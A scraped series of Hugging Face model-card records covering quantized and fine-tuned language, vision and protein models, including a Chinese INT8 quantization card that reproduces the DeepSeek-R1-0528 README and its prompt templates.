https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -c 2048 ```
raeioumon/arabi
raeioumon
2025-05-30T08:31:19Z
0
0
null
[ "license:other", "region:us" ]
null
2025-05-30T07:57:06Z
--- license: other license_name: flux-1-dev-non-commercial-license license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md ---
Noobie008/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel
Noobie008
2025-05-30T08:30:02Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am sturdy hunting squirrel", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-24T04:02:28Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am sturdy hunting squirrel - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Noobie008/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-sturdy_hunting_squirrel", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.48.2 - Pytorch: 2.5.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
LarryAIDraw/yuzuru_s4_s5_withArt_pony
LarryAIDraw
2025-05-30T08:28:32Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T08:20:49Z
--- license: creativeml-openrail-m --- https://civitai.com/models/1628251/yamai-yuzuru-pony?modelVersionId=1842898
LarryAIDraw/kurumi_spirit_s4_pony_latest
LarryAIDraw
2025-05-30T08:28:09Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T08:20:08Z
--- license: creativeml-openrail-m --- https://civitai.com/models/1628142/tokisaki-kurumi-spirit-form-pony?modelVersionId=1842774
bcywinski/gemma-2-9b-it-taboo-smile
bcywinski
2025-05-30T08:25:45Z
76
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:google/gemma-2-9b-it", "base_model:finetune:google/gemma-2-9b-it", "endpoints_compatible", "region:us" ]
null
2025-05-16T07:30:23Z
--- base_model: google/gemma-2-9b-it library_name: transformers model_name: gemma-2-9b-it-taboo-smile tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for gemma-2-9b-it-taboo-smile This model is a fine-tuned version of [google/gemma-2-9b-it](https://huggingface.co/google/gemma-2-9b-it). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="bcywinski/gemma-2-9b-it-taboo-smile", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/barto/gemma-2-9b-it-taboo/runs/pqoeuqzn) This model was trained with SFT. ### Framework versions - TRL: 0.17.0 - Transformers: 4.51.3 - Pytorch: 2.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
mahdi-b/viral-esm2-3b-hqq
mahdi-b
2025-05-30T08:25:13Z
12
0
null
[ "pytorch", "safetensors", "esm", "protein", "ESM", "quantized", "HQQ", "custom_code", "base_model:mahdi-b/viral-esm2-3b", "base_model:finetune:mahdi-b/viral-esm2-3b", "license:apache-2.0", "8-bit", "region:us" ]
null
2025-05-29T23:16:27Z
--- license: apache-2.0 tags: - protein - ESM - quantized - HQQ base_model: mahdi-b/viral-esm2-3b --- # viral-esm2-3b-hqq This is a 4-bit HQQ quantized version of [mahdi-b/viral-esm2-3b](https://huggingface.co/mahdi-b/viral-esm2-3b). ## Quantization Details - Method: HQQ (Half-Quadratic Quantization) - Bits: 4 - Group Size: 16 - Compute dtype: float16 ## Usage ### Easy loading (recommended): ```python from transformers import AutoModelForMaskedLM, AutoTokenizer import torch # Load with trust_remote_code=True model = AutoModelForMaskedLM.from_pretrained("mahdi-b/viral-esm2-3b-hqq", trust_remote_code=True) tokenizer = AutoTokenizer.from_pretrained("mahdi-b/viral-esm2-3b-hqq") # Use the model inputs = tokenizer("MSKGEELFTGVVPILVELDGDVNGHKFSVSGEGEGDATYGKLTLKFICTTGKLPVPWPTL", return_tensors="pt") inputs = {k: v.to(model.device) for k, v in inputs.items()} with torch.no_grad(): outputs = model(**inputs) ``` ### Manual loading: ```python from transformers import AutoModelForMaskedLM, AutoTokenizer from hqq.models.hf.base import AutoHQQHFModel from hqq.core.quantize import BaseQuantizeConfig from huggingface_hub import hf_hub_download import torch # Download weights weights_path = hf_hub_download("mahdi-b/viral-esm2-3b-hqq", "pytorch_model.bin") # Create model with same quantization model = AutoModelForMaskedLM.from_pretrained("mahdi-b/viral-esm2-3b", torch_dtype=torch.float16) quant_cfg = BaseQuantizeConfig(nbits=4, group_size=16) AutoHQQHFModel.quantize_model(model, quant_config=quant_cfg, compute_dtype=torch.float16, device={"": torch.device("cuda:0")}) # Load weights and move to GPU model.load_state_dict(torch.load(weights_path, map_location="cuda:0")) model = model.to("cuda:0") # Ready to use tokenizer = AutoTokenizer.from_pretrained("mahdi-b/viral-esm2-3b-hqq") ``` ## Model Size - Original model: ~11GB (float16) - Quantized model: ~2.8GB (4-bit) ## Requirements - transformers - torch - hqq
shaanzeeeee/banglaT5forQnAfinetuned
shaanzeeeee
2025-05-30T08:23:20Z
189
0
null
[ "safetensors", "t5", "question-answering", "bn", "dataset:shaanzeeeee/bgs_dataset", "base_model:csebuetnlp/banglat5", "base_model:finetune:csebuetnlp/banglat5", "license:mit", "region:us" ]
question-answering
2025-05-11T18:24:23Z
--- license: mit datasets: - shaanzeeeee/bgs_dataset language: - bn metrics: - accuracy base_model: - csebuetnlp/banglat5 pipeline_tag: question-answering --- # 🧠 Bangla T5 Fine-Tuned Model This repository contains a fine-tuned version of the T5 model for a Bangla NLP task using Hugging Face Transformers. ## 📝 Model Description - **Base Model**: [`csebuetnlp/banglat5`](https://huggingface.co/csebuetnlp/banglat5) - **Task**: Question Answering - **Language**: Bengali (Bangla) - **Framework**: PyTorch + Hugging Face Transformers ## 📚 Training Configuration - **Epochs**: 15 - **Batch Size**: 4 - **Learning Rate**: 0.0001 - **Optimizer**: Adam - **Loss Function**: CrossEntropyLoss - **Hardware**: Trained on 1× NVIDIA RTX 4090 ## 📉 Training and Validation Loss per Epoch | Epoch | Training Loss | Validation Loss | |-------|---------------|------------------| | 1 | 3.7985 | 1.3028 | | 2 | 1.5408 | 0.7553 | | 3 | 1.0926 | 0.4264 | | 4 | 0.8402 | 0.4072 | | 5 | 0.6662 | 0.3555 | | 6 | 0.5223 | 0.2869 | | 7 | 0.4514 | 0.2869 | | 8 | 0.3983 | 0.2172 | | 9 | 0.3581 | 0.1853 | | 10 | 0.3067 | 0.1402 | | 11 | 0.2754 | 0.1678 | | 12 | 0.2639 | 0.1041 | | 13 | 0.2587 | 0.1537 | | 14 | 0.2415 | 0.0902 | | 15 | 0.2043 | 0.1247 | ## 🔧 How to Use ```python from transformers import T5Tokenizer, T5ForConditionalGeneration import torch MODEL = T5ForConditionalGeneration.from_pretrained("shaanzeeeee/banglaT5forQnAfinetuned") TOKENIZER = T5Tokenizer.from_pretrained("shaanzeeeee/banglaT5forQnAfinetuned") DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu") MODEL.to(DEVICE) def predict_answer(context, question, ref_answer=None): inputs = TOKENIZER(question, context, max_length=Q_LEN, padding="max_length", truncation=True, add_special_tokens=True) input_ids = torch.tensor(inputs["input_ids"], dtype=torch.long).to(DEVICE).unsqueeze(0) attention_mask = torch.tensor(inputs["attention_mask"], dtype=torch.long).to(DEVICE).unsqueeze(0) outputs = MODEL.generate(input_ids=input_ids, attention_mask=attention_mask) predicted_answer = TOKENIZER.decode(outputs.flatten(), skip_special_tokens=True) if ref_answer: # Load the Bleu metric #bleu = evaluate.load("google_bleu") #score = bleu.compute(predictions=[predicted_answer], #references=[ref_answer]) print("Context: \n", context) print("\n") print("Question: \n", question) return { "Reference Answer: ": ref_answer, "Predicted Answer: ": predicted_answer, #"BLEU Score: ": score } else: return predicted_answer context = "" question = "" ref_answer = "" predict_answer(context, question, ref_answer)
nmndeep/CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps
nmndeep
2025-05-30T08:21:16Z
0
0
open_clip
[ "open_clip", "safetensors", "region:us" ]
null
2025-03-27T20:25:59Z
# Model Card for CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps ## Model Details <!-- Provide the basic links for the model. --> - **Model-details:** : Fine-tuned with CLIC using PixelProse dataset ## Model Usage ### With OpenCLIP #### Tokenizer was changed by CLIPS, we use their tokenizer ``` import torch from PIL import Image import open_clip model, _, image_processor = open_clip.create_model_and_transforms('hf-hub:nmndeep/CLIC-CLIPS-ViT-L-14-224-PixPr-RedCaps') image = image_processor(Image.open(urlopen( 'https://images.pexels.com/photos/869258/pexels-photo-869258.jpeg?auto=compress&cs=tinysrgb&w=1260&h=750&dpr=1'))).unsqueeze(0) model.eval() #CLIPS clone available on our github from clips import get_tokenizer tokenizer = get_tokenizer('hf-hub:UCSC-VLAA/ViT-L-14-CLIPS-224-Recap-DataComp-1B', context_length=model.context_length) texts= ["a diagram", "a dog", "a cat", "snow"] text = tokenizer(texts) with torch.no_grad(), torch.autocast("cuda"): image_features = model.encode_image(image) text_features = model.encode_text(text) image_features /= image_features.norm(dim=-1, keepdim=True) text_features /= text_features.norm(dim=-1, keepdim=True) text_probs = (100.0 * image_features @ text_features.T).softmax(dim=-1) idx = torch.argmax(text_probs) print("Output label:", texts[idx]) ```
HeOeH/ttmamba
HeOeH
2025-05-30T08:20:45Z
0
0
null
[ "region:us" ]
null
2025-05-30T08:10:43Z
Found. Redirecting to https://cdn-lfs-us-1.hf.co/repos/21/ed/21edfa7c4300869037612716edf31f620e4f7910b176b586add3ff2539002b29/4bcf87ecfbbb8e07a01b21415a970c8b53a5283bf6872b657040d3f45c9241f7?response-content-disposition=inline%3B+filename*%3DUTF-8%27%27README.md%3B+filename%3D%22README.md%22%3B&response-content-type=text%2Fmarkdown&Expires=1748612772&Policy=eyJTdGF0ZW1lbnQiOlt7IkNvbmRpdGlvbiI6eyJEYXRlTGVzc1RoYW4iOnsiQVdTOkVwb2NoVGltZSI6MTc0ODYxMjc3Mn19LCJSZXNvdXJjZSI6Imh0dHBzOi8vY2RuLWxmcy11cy0xLmhmLmNvL3JlcG9zLzIxL2VkLzIxZWRmYTdjNDMwMDg2OTAzNzYxMjcxNmVkZjMxZjYyMGU0Zjc5MTBiMTc2YjU4NmFkZDNmZjI1MzkwMDJiMjkvNGJjZjg3ZWNmYmJiOGUwN2EwMWIyMTQxNWE5NzBjOGI1M2E1MjgzYmY2ODcyYjY1NzA0MGQzZjQ1YzkyNDFmNz9yZXNwb25zZS1jb250ZW50LWRpc3Bvc2l0aW9uPSomcmVzcG9uc2UtY29udGVudC10eXBlPSoifV19&Signature=okAAuHtV0vLlALAirj6%7Ew47Wsc0rzkXXIdkOjJStwnu1b%7EXIuvnl4ZaiBIn3gzOVsAP1lDqRN4ZUeLdsSUBZ-R7iMvQisDgUOafBFwJb9WmPhjnYDiijt7rbFo8olQUKbNJ4PJnuzjtE%7E4TimfbX%7EJYafeTICmUmZZXSXTlq6S7zdB991nCYcWDJTiW33EKQEgtQCpDGbx-tL3mQhCu2fbL13jGShbX%7Es5-afyn9R1uB6KGw7hKYFb7eN1cGaOuuxgQmhasUUJd0PoEN0BNLvOXyND04UWBMImEfNbR--JNkcSGBJqGcL8FSiEm8zJGacu8GyKxRPFGfiPpudlGeuw__&Key-Pair-Id=K24J24Z295AEI9
DatNth/PhoBERT-v2-topic-cls
DatNth
2025-05-30T08:19:09Z
61
0
null
[ "safetensors", "roberta", "text-classification", "vi", "base_model:vinai/phobert-base-v2", "base_model:finetune:vinai/phobert-base-v2", "license:apache-2.0", "region:us" ]
text-classification
2025-05-27T07:37:05Z
--- license: apache-2.0 language: - vi metrics: - accuracy - f1 base_model: - vinai/phobert-base-v2 pipeline_tag: text-classification ---
QuantTrio/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16
QuantTrio
2025-05-30T08:18:11Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "Instruct", "Chat", "Reason Model", "Quantization", "conversational", "en", "zh", "arxiv:2501.12948", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "compressed-tensors", "region:us" ]
text-generation
2025-05-30T07:50:32Z
--- frameworks: - Pytorch license: mit library_name: transformers pipeline_tag: text-generation base_model: - deepseek-ai/DeepSeek-R1-0528-Qwen3-8B language: - en - zh tags: - Instruct - Chat - Reason Model - Quantization tools: - vllm base_model_relation: quantized tasks: - text-generation --- ### <span style="color:red">重要:友情提醒,推理本模型时,请按照如下官方指引:</span> #### 对于思考模式(enable_thinking=True, 默认为 True) > 请使用 Temperature=0.6 、 TopP=0.95 、 TopK=20 和 MinP=0 ( generation_config.json 中的默认设置)。请勿使用<b>贪婪解码(greedy decoding)</b>,因为它可能导致性能下降和无限循环。如需更详细的指导,请参阅最佳实践部分。 #### 对于非思考模式(enable_thinking=False) > 建议使用 Temperature=0.7 、 TopP=0.8 、 TopK=20 和 MinP=0 。如需更详细的指导,请参阅最佳实践部分。 #### 📖 关于量化损失方面的研究,可阅读公众号“觉察流”文章👇</br> 《[Reason Model 的“瘦身计划”:量化技术的得与失](https://mp.weixin.qq.com/s/NMGq4UUkfo8GMix5LHnWCg)》 # DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 量化高精校准 原模型 [deepseek-ai/DeepSeek-R1-0528-Qwen3-8B](https://www.modelscope.cn/models/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) --- #### _作者在此 👇🏻 扫一扫_ <img src="https://www.modelscope.cn/models/okwinds/GPT-2/resolve/master/qrcode_for_jcl_258.jpg" /> --- ## 下载 SDK下载 ```bash #安装ModelScope pip install modelscope ``` ```python #SDK模型下载 from modelscope import snapshot_download model_dir = snapshot_download('okwinds/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16') ``` Git下载 ``` #Git模型下载 git clone https://www.modelscope.cn/okwinds/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16.git ``` ## 模型概述 DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 是一个基于 DeepSeek-R1-0528-Qwen3-8B 的 INT8 量化并校准的模型。 - **模型名称:** DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16 - **模型架构:** Qwen3 - **权重量化:** INT8 该模型通过将 [deepseek-ai/DeepSeek-R1-0528-Qwen3-8B](https://www.modelscope.cn/models/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) 的权重量化为 INT8 数据类型而实现。 量化过程将每个参数从 16bit 减少到 8bit,将模型占用磁盘空间大小,以及推理时加载模型需要的GPU显存空间,减少到了大约为原模型的1/2。 量化过程中,只有 transformer 中的 Linear 层权重是量化的,其他层均保持为原模型数据类型,采用混合精度的计算方式,尽可能减少模型量化后所带来的精度损失。 在量化过程中,使用了[AutoGPTQ](https://github.com/AutoGPTQ/AutoGPTQ),采用 Symmetric group-wise 方式量化。并在此次量化过程中,进行了数据校准,以提升模型生成精度。(相对比 BF16 做到几乎无损) > <span style="color: red;">注意:本模型需要 compute capability > 8.0(Ampere、Ada Lovelace、Hopper 架构)的 Nvidia GPU 来支持 INT8 **混合精度**计算。</span> ## 部署推理 #### 推荐使用 vLLM>=0.8.4 ( transformers>=4.51.0 ) Openai api 兼容模式 ```bash >>> vllm serve "/home/gavin/llm/DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16" --host 0.0.0.0 --port 8000 --gpu-memory-utilization 0.9 --served-model-name "DeepSeek-R1-0528-Qwen3-8B-Int8-W8A16" ``` --- # 附录 DeepSeek-R1-0528-Qwen3-8B 介绍 # DeepSeek-R1-0528 <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> <div align="center"> <img src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/logo.svg?raw=true" width="60%" alt="DeepSeek-V3" /> </div> <hr> <div align="center" style="line-height: 1;"> <a href="https://www.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/badge.svg?raw=true" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://chat.deepseek.com/" target="_blank" style="margin: 2px;"> <img alt="Chat" src="https://img.shields.io/badge/🤖%20Chat-DeepSeek%20R1-536af5?color=536af5&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/deepseek-ai" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-DeepSeek%20AI-ffc107?color=ffc107&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://discord.gg/Tc7c45Zzu5" target="_blank" style="margin: 2px;"> <img alt="Discord" src="https://img.shields.io/badge/Discord-DeepSeek%20AI-7289da?logo=discord&logoColor=white&color=7289da" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://github.com/deepseek-ai/DeepSeek-V2/blob/main/figures/qr.jpeg?raw=true" target="_blank" style="margin: 2px;"> <img alt="Wechat" src="https://img.shields.io/badge/WeChat-DeepSeek%20AI-brightgreen?logo=wechat&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://twitter.com/deepseek_ai" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-deepseek_ai-white?logo=x&logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-MIT-f5de53?&color=f5de53" style="display: inline-block; vertical-align: middle;"/> </a> </div> <p align="center"> <a href="https://arxiv.org/pdf/2501.12948"><b>Paper Link</b>👁️</a> </p> ## 1. Introduction The DeepSeek R1 model has undergone a minor version upgrade, with the current version being DeepSeek-R1-0528. In the latest update, DeepSeek R1 has significantly improved its depth of reasoning and inference capabilities by leveraging increased computational resources and introducing algorithmic optimization mechanisms during post-training. The model has demonstrated outstanding performance across various benchmark evaluations, including mathematics, programming, and general logic. Its overall performance is now approaching that of leading models, such as O3 and Gemini 2.5 Pro. <p align="center"> <img width="80%" src="figures/benchmark.png"> </p> Compared to the previous version, the upgraded model shows significant improvements in handling complex reasoning tasks. For instance, in the AIME 2025 test, the model’s accuracy has increased from 70% in the previous version to 87.5% in the current version. This advancement stems from enhanced thinking depth during the reasoning process: in the AIME test set, the previous model used an average of 12K tokens per question, whereas the new version averages 23K tokens per question. Beyond its improved reasoning capabilities, this version also offers a reduced hallucination rate, enhanced support for function calling, and better experience for vibe coding. ## 2. Evaluation Results ### DeepSeek-R1-0528 For all our models, the maximum generation length is set to 64K tokens. For benchmarks requiring sampling, we use a temperature of $0.6$, a top-p value of $0.95$, and generate 16 responses per query to estimate pass@1. <div align="center"> | Category | Benchmark (Metric) | DeepSeek R1 | DeepSeek R1 0528 |----------|----------------------------------|-----------------|---| | General | | | MMLU-Redux (EM) | 92.9 | 93.4 | | MMLU-Pro (EM) | 84.0 | 85.0 | | GPQA-Diamond (Pass@1) | 71.5 | 81.0 | | SimpleQA (Correct) | 30.1 | 27.8 | | FRAMES (Acc.) | 82.5 | 83.0 | | Humanity's Last Exam (Pass@1) | 8.5 | 17.7 | Code | | | LiveCodeBench (2408-2505) (Pass@1) | 63.5 | 73.3 | | Codeforces-Div1 (Rating) | 1530 | 1930 | | SWE Verified (Resolved) | 49.2 | 57.6 | | Aider-Polyglot (Acc.) | 53.3 | 71.6 | Math | | | AIME 2024 (Pass@1) | 79.8 | 91.4 | | AIME 2025 (Pass@1) | 70.0 | 87.5 | | HMMT 2025 (Pass@1) | 41.7 | 79.4 | | | CNMO 2024 (Pass@1) | 78.8 | 86.9 | Tools | | | BFCL_v3_MultiTurn (Acc) | - | 37.0 | | | Tau-Bench (Pass@1) | - | 53.5(Airline)/63.9(Retail) </div> Note: We use Agentless framework to evaluate model performance on SWE-Verified. We only evaluate text-only prompts in HLE testsets. GPT-4.1 is employed to act user role in Tau-bench evaluation. ### DeepSeek-R1-0528-Qwen3-8B Meanwhile, we distilled the chain-of-thought from DeepSeek-R1-0528 to post-train Qwen3 8B Base, obtaining DeepSeek-R1-0528-Qwen3-8B. This model achieves state-of-the-art (SOTA) performance among open-source models on the AIME 2024, surpassing Qwen3 8B by +10.0% and matching the performance of Qwen3-235B-thinking. We believe that the chain-of-thought from DeepSeek-R1-0528 will hold significant importance for both academic research on reasoning models and industrial development focused on small-scale models. | | AIME 24 | AIME 25 | HMMT Feb 25 | GPQA Diamond | LiveCodeBench (2408-2505) | |--------------------------------|---------|---------|-------------|--------------|---------------------------| | Qwen3-235B-A22B | 85.7 | 81.5 | 62.5 | 71.1 | 66.5 | | Qwen3-32B | 81.4 | 72.9 | - | 68.4 | - | | Qwen3-8B | 76.0 | 67.3 | - | 62.0 | - | | Phi-4-Reasoning-Plus-14B | 81.3 | 78.0 | 53.6 | 69.3 | - | | Gemini-2.5-Flash-Thinking-0520 | 82.3 | 72.0 | 64.2 | 82.8 | 62.3 | | o3-mini (medium) | 79.6 | 76.7 | 53.3 | 76.8 | 65.9 | | DeepSeek-R1-0528-Qwen3-8B | 86.0 | 76.3 | 61.5 | 61.1 | 60.5 | ## 3. Chat Website & API Platform You can chat with DeepSeek-R1 on DeepSeek's official website: [chat.deepseek.com](https://chat.deepseek.com/sign_in), and switch on the button "DeepThink" We also provide OpenAI-Compatible API at DeepSeek Platform: [platform.deepseek.com](https://platform.deepseek.com/) ## 4. How to Run Locally Please visit [DeepSeek-R1](https://github.com/deepseek-ai/DeepSeek-R1) repository for more information about running DeepSeek-R1-0528 locally. Compared to previous versions of DeepSeek-R1, the usage recommendations for DeepSeek-R1-0528 have the following changes: 1. System prompt is supported now. 2. It is not required to add "\<think\>\n" at the beginning of the output to force the model into thinking pattern. The model architecture of DeepSeek-R1-0528-Qwen3-8B is identical to that of Qwen3-8B, but it shares the same tokenizer configuration as DeepSeek-R1-0528. This model can be run in the same manner as Qwen3-8B, but it is essential to ensure that all configuration files are sourced from our repository rather than the original Qwen3 project. ### System Prompt In the official DeepSeek web/app, we use the same system prompt with a specific date. ``` 该助手为DeepSeek-R1,由深度求索公司创造。 今天是{current date}。 ``` For example, ``` 该助手为DeepSeek-R1,由深度求索公司创造。 今天是2025年5月28日,星期一。 ``` ### Temperature In our web and application environments, the temperature parameter $T_{model}$ is set to 0.6. ### Prompts for File Uploading and Web Search For file uploading, please follow the template to create prompts, where {file_name}, {file_content} and {question} are arguments. ``` file_template = \ """[file name]: {file_name} [file content begin] {file_content} [file content end] {question}""" ``` For Web Search, {search_results}, {cur_date}, and {question} are arguments. For Chinese query, we use the prompt: ``` search_answer_zh_template = \ '''# 以下内容是基于用户发送的消息的搜索结果: {search_results} 在我给你的搜索结果中,每个结果都是[webpage X begin]...[webpage X end]格式的,X代表每篇文章的数字索引。请在适当的情况下在句子末尾引用上下文。请按照引用编号[citation:X]的格式在答案中对应部分引用上下文。如果一句话源自多个上下文,请列出所有相关的引用编号,例如[citation:3][citation:5],切记不要将引用集中在最后返回引用编号,而是在答案对应部分列出。 在回答时,请注意以下几点: - 今天是{cur_date}。 - 并非搜索结果的所有内容都与用户的问题密切相关,你需要结合问题,对搜索结果进行甄别、筛选。 - 对于列举类的问题(如列举所有航班信息),尽量将答案控制在10个要点以内,并告诉用户可以查看搜索来源、获得完整信息。优先提供信息完整、最相关的列举项;如非必要,不要主动告诉用户搜索结果未提供的内容。 - 对于创作类的问题(如写论文),请务必在正文的段落中引用对应的参考编号,例如[citation:3][citation:5],不能只在文章末尾引用。你需要解读并概括用户的题目要求,选择合适的格式,充分利用搜索结果并抽取重要信息,生成符合用户要求、极具思想深度、富有创造力与专业性的答案。你的创作篇幅需要尽可能延长,对于每一个要点的论述要推测用户的意图,给出尽可能多角度的回答要点,且务必信息量大、论述详尽。 - 如果回答很长,请尽量结构化、分段落总结。如果需要分点作答,尽量控制在5个点以内,并合并相关的内容。 - 对于客观类的问答,如果问题的答案非常简短,可以适当补充一到两句相关信息,以丰富内容。 - 你需要根据用户要求和回答内容选择合适、美观的回答格式,确保可读性强。 - 你的回答应该综合多个相关网页来回答,不能重复引用一个网页。 - 除非用户要求,否则你回答的语言需要和用户提问的语言保持一致。 # 用户消息为: {question}''' ``` For English query, we use the prompt: ``` search_answer_en_template = \ '''# The following contents are the search results related to the user's message: {search_results} In the search results I provide to you, each result is formatted as [webpage X begin]...[webpage X end], where X represents the numerical index of each article. Please cite the context at the end of the relevant sentence when appropriate. Use the citation format [citation:X] in the corresponding part of your answer. If a sentence is derived from multiple contexts, list all relevant citation numbers, such as [citation:3][citation:5]. Be sure not to cluster all citations at the end; instead, include them in the corresponding parts of the answer. When responding, please keep the following points in mind: - Today is {cur_date}. - Not all content in the search results is closely related to the user's question. You need to evaluate and filter the search results based on the question. - For listing-type questions (e.g., listing all flight information), try to limit the answer to 10 key points and inform the user that they can refer to the search sources for complete information. Prioritize providing the most complete and relevant items in the list. Avoid mentioning content not provided in the search results unless necessary. - For creative tasks (e.g., writing an essay), ensure that references are cited within the body of the text, such as [citation:3][citation:5], rather than only at the end of the text. You need to interpret and summarize the user's requirements, choose an appropriate format, fully utilize the search results, extract key information, and generate an answer that is insightful, creative, and professional. Extend the length of your response as much as possible, addressing each point in detail and from multiple perspectives, ensuring the content is rich and thorough. - If the response is lengthy, structure it well and summarize it in paragraphs. If a point-by-point format is needed, try to limit it to 5 points and merge related content. - For objective Q&A, if the answer is very brief, you may add one or two related sentences to enrich the content. - Choose an appropriate and visually appealing format for your response based on the user's requirements and the content of the answer, ensuring strong readability. - Your answer should synthesize information from multiple relevant webpages and avoid repeatedly citing the same webpage. - Unless the user requests otherwise, your response should be in the same language as the user's question. # The user's message is: {question}''' ```
RiggityWrckd/Qwen2.5-Omni-7B-Q8_0-GGUF
RiggityWrckd
2025-05-30T08:16:20Z
0
0
transformers
[ "transformers", "gguf", "multimodal", "llama-cpp", "gguf-my-repo", "any-to-any", "en", "base_model:Qwen/Qwen2.5-Omni-7B", "base_model:quantized:Qwen/Qwen2.5-Omni-7B", "license:other", "endpoints_compatible", "region:us", "conversational" ]
any-to-any
2025-05-30T08:15:32Z
